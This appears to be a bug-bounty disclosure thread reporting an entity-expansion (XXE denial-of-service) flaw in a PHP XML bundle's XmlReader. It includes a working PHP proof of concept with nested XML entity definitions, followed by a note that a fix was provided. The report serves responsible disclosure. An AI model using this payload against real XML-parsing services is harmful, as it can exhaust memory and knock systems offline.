XXE DoS Security Vulnerability

[prodigysml]

XMLBundle's XMLReader is vulnerable to an XXE DoS vulnerability. The code with the PoC is given below:

<?php

include 'autoload.php';
use Desperado\XmlBundle\Model\XmlReader;

        $xmlString = '<?xml version="1.0" standalone="no" ?>
<!DOCTYPE request [
<!ENTITY a0 "dosdosdosdosdosdosdosdosdosdosdosdosdosdosdosdosdosdos">
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
]>
<request>
                          <Details>
                              <PaymentParameters>
                                  <first_node>first_node_value</first_node>
                                  <second_node>&a1;</second_node>
                              </PaymentParameters>
                          </Details>
                      </request>';

        $xmlReader = new XmlReader;

	var_dump($xmlReader->processConvert($xmlString));

This can be used to create very large strings, which can eventually DoS the system. Due to the working of SimpleXmlIterator, we cannot run system commands using the package (tested with my limited knowledge though). However, entities can be used easily. Hope this helps!

[huntr-helper]

‎‍🛠️ A fix has been provided for this issue. Please reference: 418sec#2

🔥 This fix has been provided through the https://huntr.dev/ bug bounty platform.